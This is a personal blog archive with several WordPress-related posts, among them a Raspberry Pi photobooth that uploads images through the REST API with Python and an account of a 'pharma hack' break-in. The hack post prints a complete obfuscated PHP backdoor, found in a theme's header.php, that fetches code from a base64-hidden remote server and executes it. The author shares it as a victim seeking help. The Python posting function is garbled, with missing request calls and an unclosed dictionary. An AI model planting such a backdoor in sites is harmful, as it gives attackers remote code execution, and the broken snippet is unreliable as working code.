Fornetto publishes to WordPress with Raspberry Pi and Python

Finally I took the time to clean up the Python code that publishes to images from the modified microwave toy to a WordPress site. I’m lying: the code is not clean at all but it serves its purpose… ship it!

In the process I learned a few things about WordPress REST API, Python and the Raspberry Pi. All fun. Python is basically the default language for Raspberry Pi. There are numerous modules to access all the hardware functions of the board and countless examples, tutorials, blog posts, wiki pages, meetups all about Python. The REST API Handbook is the main resource I used.  Many tutorials online were written when the WP APIs were a separate plugin and they seem outdated. The handbook seems to be written with developers working within WordPress, with all examples provided in PHP and Javascript. I ended up writing a brief tutorial on how to create a post with images to WordPress using Python.

There are lots of photobooth applications targeting Raspberry Pis out there. I ended up forking drumminhands_photobooth which seemed polished enough. It’s originally designed to snap 4 pictures at the press of a button, blink a LED and show previews of the pictures on a screen, then create an animated GIF from the snapped poses and publish them to tumblr. Alternatively, publishes 4 independent JPEGs, based on a configuration option.

One cool thing about tumblr APIs is that they have a Python library dealing with authentication and the basic publishing operations. WordPress REST API don’t have anything like that (yet). Even authentication from a Python app requires an external plugin, which is not ideal.

The core of the photobooth app is the function publishing to WordPress:

def wp_make_post(gif, wp_title, wp_content):
        wpupload = + "/media", headers=wpheaders, files=gif)
	print "Your image is on " + json.loads(wpupload.content)['link']
	# get the post ID from WP
	wpimg = json.loads(wpupload.content)['id']
	print wpimg
	# prepare the post content in json
	wppost = {'categories':'3', \
                  'title':wp_title, \
                  'content':wp_content, \
                  'format':'image', \
                  'featured_media':wpimg, \
                  'author':'1', \
	print wppost
	# post the json to WP
	wpdopost = + "/posts", headers=wpheaders, json=wppost)
displayStatus("Your image is on " + json.loads(wpdopost.content)['link'], 14)

Now every time someone pushes the Start button on the toy microwave, its light blinks and the screen shows instructions while snapping pictures and uploading them.

On the WordPress side, I picked Morphology Lite because of how the home page can be turned into a mosaic of images from the Featured image of the post. That’s it! I’ll update this post once I have enough images from an event.

How To Use Vagrant And Git To Develop A WordPress Theme


Sometimes I like to sit down and play with technology. My colleague Mike Shroder mentioned VVV a few weeks ago and I had to try it. Check out this tutorial I wrote on how to create a new WordPress site, use Vagrant and git to develop a new theme locally, then push the modifications to a live site running on DreamHost (but it could run anywhere else, really).

Source: How To Use Vagrant And Git To Develop A WordPress Theme

Getting busy on the blog for the wrong reasons

I’ve been spending lots of time on this blog but not for good reasons. I’m currently under the attack of the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my wordpress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use.  I changed the ftp password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful to identify the entry point for this cracker please let me know.

UPDATE: I think I found the backdoor  that the bastard is using. It was in the header.php of one of the templates:

<?php /* system_remote_fopen procedure */ $er=error_reporting(0); $f_sys_remote_fopen=create_function(‘$uri’,’$_url=@parse_url($uri); if(!$_url || !is_array($_url)) return false; if(!isset($_url[“scheme”]) || !in_array($_url[“scheme”],array(“http”,”https”))) $uri=”http://”.$uri; if(function_exists(“curl_init”)){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$uri); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $txt=curl_exec($ch); curl_close($ch); return $txt; }elseif(function_exists(“fsockopen”)){ $f=@fsockopen($_url[“host”],80,$errno,$errstr,5); @stream_set_timeout($f,10); if($f){ $s=”GET $uri HTTP/1.0rnHost: “.$_url[“host”].”rnConnection: Closernrn”; @fwrite($f,$s); $txt=””; while(!feof($f)) $txt.=@fgets($f,128); $txt=trim($txt); } @fclose($f); return substr($txt,strpos($txt,”rnrn”)+4); }elseif(@ini_get(“allow_url_fopen”)){ @ini_set(“default_socket_timeout”,10); $fp=@fopen($uri,”r”); if(!$fp) return false; $txt=””; while($ln=@fread($fp,4096)) $txt.=$ln; @fclose($fp); return $txt; }else return “”;’); $sys_remote_fopen=’aHR0cDovL2luY29tZWluLm5ldC8=’; $opt_id=’4f66ac83efc3ebdc05a18f757f30f875′; $sess=@file_get_contents(‘/tmp/sess_’.md5($opt_id)); $_sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.md5′)); if($_sess!=”” && $_sess!=md5($sess)){ $sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.txt’)); $fh=@fopen(“/tmp/sess_”.md5($opt_id),”w+”); @fwrite($fh,$sess); @fclose($fh); } $sess=@unserialize(@base64_decode($sess)); if($sess && $sess[‘uptime’]!=””){ unset($sess_f); $sess_f=create_function(“$a”,$sess[‘uptime’]); $sess_f(&$sess); } error_reporting($er); /* system_remote_fopen procedure */ ?>

Lets see how long this lasts.

Upgraded wordpress, closing the week

This WordPress needed some maintainance, but this time instead of upgrading ‘manually’ I decided to use the WordPress Automatic Upgrade Plugin: boy, it was fast and simple. It seems to be working fine.’  If you spot any glitches let me know. Now for me it’s time to go play with the RC minihelicopter and away from computers.

Tomorrow I’ll meet Hal in person for the first time at Malpensa while he is flying to Barcelona for the MWC: I’ll take pictures 🙂

Small changes to the blog

I’ve started the new tag system offered by WordPress 2.3.1 a few weeks ago and I’ve also stopped using the categories. I left them on because I didn’t want to change the archives.’  I’m still looking for a way to deal with dual language posts: WordPress seems not to support natively multiple languages (we talked at the Cena Lunga about this with Giacomo and LK).’  I thought of using different categories, it and eng, but I’m not sure how to achieve separate feeds. Gengo seems too complicated and doesn’t work on 2.3.1anyway, other solutions I found seem abandoned. Does anybody know of a *stable* solution to mark posts as Italian or English, offering two separate feeds?

While I was playing with WP I’ve added two new widgets: one from twitter (more freaky experimenting with social networks) and the new FSF fund raising widget. Put it on your blog too and give yourself a nice Christmas present donating to FSF. Did you know they have also a fund to support the defense of poor moms and kids against the RIAA lawsuits?